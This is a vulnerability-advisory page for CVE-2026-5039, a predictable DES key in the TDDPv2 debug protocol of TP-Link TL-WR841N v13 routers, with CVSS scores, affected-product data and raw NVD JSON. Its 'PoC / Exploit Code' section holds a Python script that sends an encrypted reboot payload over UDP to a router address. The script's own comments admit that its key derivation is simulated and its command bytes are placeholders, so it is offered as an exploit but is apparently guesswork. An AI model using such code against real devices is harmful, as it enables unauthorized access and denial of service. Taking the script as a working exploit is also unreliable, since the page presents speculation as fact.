Security Vulnerability Report
中文
CVE-2026-5039 CVSS 8.8 HIGH

CVE-2026-5039

Published: 2026-04-23 18:16:30
Last Modified: 2026-05-05 14:11:59
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

TP-Link TL-WR841N v13 uses DES-CBC encryption in the TDDPv2 debug protocol with a cryptographic key derived from default web management credentials, making the key predictable if device is left in default configuration. A network-adjacent attacker can exploit this weakness to gain unauthorized access to the protocol, read debug data, modify certain device configuration values, and trigger device reboot, resulting in loss of integrity and a denial-of-service condition.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:tl-wr841n_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:tl-wr841n:13.0:*:*:*:*:*:*:* - NOT VULNERABLE
TP-Link TL-WR841N v13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket from Crypto.Cipher import DES from Crypto.Util.Padding import pad # Default credentials used to derive the key DEFAULT_USER = "admin" DEFAULT_PASS = "admin" def generate_key(user, password): # Simulate key derivation from default credentials raw = (user + password).encode('utf-8') key = raw[:8] if len(key) < 8: key = key.ljust(8, b'\x00') return key def send_exploit(target_ip, target_port=1040): # Generate predictable DES key key = generate_key(DEFAULT_USER, DEFAULT_PASS) # Initialize cipher with 0 IV (common in poorly implemented protocols) cipher = DES.new(key, DES.MODE_CBC, iv=b'\x00' * 8) # Craft malicious payload (e.g., reboot command) # Specific command bytes depend on TDDPv2 implementation payload = b"\x02\x00\x00\x00" + b"REBOOT_SYSTEM" encrypted_payload = cipher.encrypt(pad(payload, DES.block_size)) print(f"[+] Sending payload to {target_ip}") try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(encrypted_payload, (target_ip, target_port)) print("[+] Exploit payload sent.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with the target router IP target = "192.168.0.1" send_exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5039", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-04-23T18:16:30.377", "lastModified": "2026-05-05T14:11:58.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TP-Link TL-WR841N v13 uses DES-CBC encryption in the TDDPv2 debug protocol with a cryptographic key derived from default web management credentials, making the key predictable if device is left in default configuration. A network-adjacent attacker can exploit this weakness to gain unauthorized access to the protocol, read debug data, modify certain device configuration values, and trigger device reboot, resulting in loss of integrity and a denial-of-service condition."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1394"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tl-wr841n_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "231120", "matchCriteriaId": "DCEA238F-6C56-45C3-B889-477568C5BE47"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:tl-wr841n:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8E3FFDF-5026-4037-BF2F-0BF5D3E7EB26"}]}]}], "references": [{"url": "https://www.tp-link.com/us/support/download/tl-wr841n/v13/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.